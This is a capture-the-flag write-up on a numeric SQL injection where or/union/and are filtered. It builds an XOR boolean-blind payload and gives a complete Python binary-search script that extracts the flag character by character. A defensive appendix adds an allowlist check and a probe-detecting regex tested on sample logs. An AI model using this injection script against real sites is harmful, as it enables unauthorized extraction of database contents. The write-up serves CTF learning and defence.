Entering 1/1 echoes back Hello, glzjin wants a girlfriend.
So we conclude this is a numeric-type injection (the parameter is not quoted).
After much trial and error we find that or, union and and are filtered, but () apparently is not.
We use boolean blind injection (false branch) built on XOR, which here does the job of the filtered or:
0^0 //false
0^1 //true
So we construct the payload: 0^(ascii(substr((select(flag)from(flag)),1,1))>1)
We also find that probing too fast apparently gets you locked out, so the pace needs watching.
A binary-search script picked up from an expert:
import requests
import time  # imported for pacing the probes; the target rejects requests sent too fast

url = "http://5630e1a6-6a3b-46f3-b10c-3c93b8f50376.node3.buuoj.cn/index.php"
payload = {
    "id": ""
}
result = ""
for i in range(1, 100):          # i = position of the character being extracted
    l = 32                       # lower bound of the searched ASCII range (32 so the space/end check below can trigger)
    r = 130
    mid = (l + r) >> 1
    while l < r:
        # 0^(cond) keeps the truth value of cond, standing in for the filtered or/and
        payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i, mid)
        html = requests.post(url, data=payload)
        print(payload)
        if "Hello" in html.text:  # true branch echoes the normal greeting
            l = mid + 1
        else:
            r = mid
        mid = (l + r) >> 1
    if chr(mid) == " ":           # past the end of the flag: every comparison is false, search bottoms out
        break
    result = result + chr(mid)
    print(result)
print("flag: ", result)
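A defender-side counterpart, added here and not part of the original writeup: the allowlist check a numeric id endpoint should apply, plus a detector for the XOR probe shape run over constructed sample log entries (all client addresses and request bodies are made up).

```python
import re
from collections import Counter
from urllib.parse import parse_qs

# Constructed sample of (client, POST body) pairs, as an application or WAF log might record them.
SAMPLE_REQUESTS = [
    ("10.0.0.5", "id=1"),
    ("10.0.0.5", "id=2"),
    ("10.0.0.9", "id=0^(ascii(substr((select(flag)from(flag)),1,1))>81)"),
    ("10.0.0.9", "id=0^(ascii(substr((select(flag)from(flag)),1,1))>105)"),
    # Same probe, URL-encoded: ^ ( ) , > become %5E %28 %29 %2C %3E
    ("10.0.0.9", "id=0%5E%28ascii%28substr%28%28select%28flag%29from%28flag%29%29%2C1%2C1%29%29%3E93%29"),
    ("10.0.0.7", "id=3"),
]

# Shape of the probe in the writeup: <number> ^ ( ... ascii(substr( ... ) ... ).
PROBE_RE = re.compile(r"\d+\s*\^\s*\(.*ascii\s*\(\s*substr\s*\(", re.IGNORECASE | re.DOTALL)


def id_value(body: str) -> str:
    """Extract and percent-decode the id parameter from a form-encoded POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("id", [""])[0]


def is_valid_id(value: str) -> bool:
    """Allowlist check the endpoint should have done: a numeric id is digits only.
    This rejects 0^(...) outright, independent of any keyword blacklist."""
    return re.fullmatch(r"\d{1,10}", value) is not None


def is_probe(body: str) -> bool:
    """True when the decoded id carries the XOR boolean-blind probe shape."""
    return PROBE_RE.search(id_value(body)) is not None


def suspicious_clients(log, threshold=2):
    """Return {client: probe_count} for clients that sent at least `threshold` probes.
    Extracting one character by binary search takes about seven probes, so a real
    extraction crosses a low threshold within seconds."""
    counts = Counter(client for client, body in log if is_probe(body))
    return {client: n for client, n in counts.items() if n >= threshold}
```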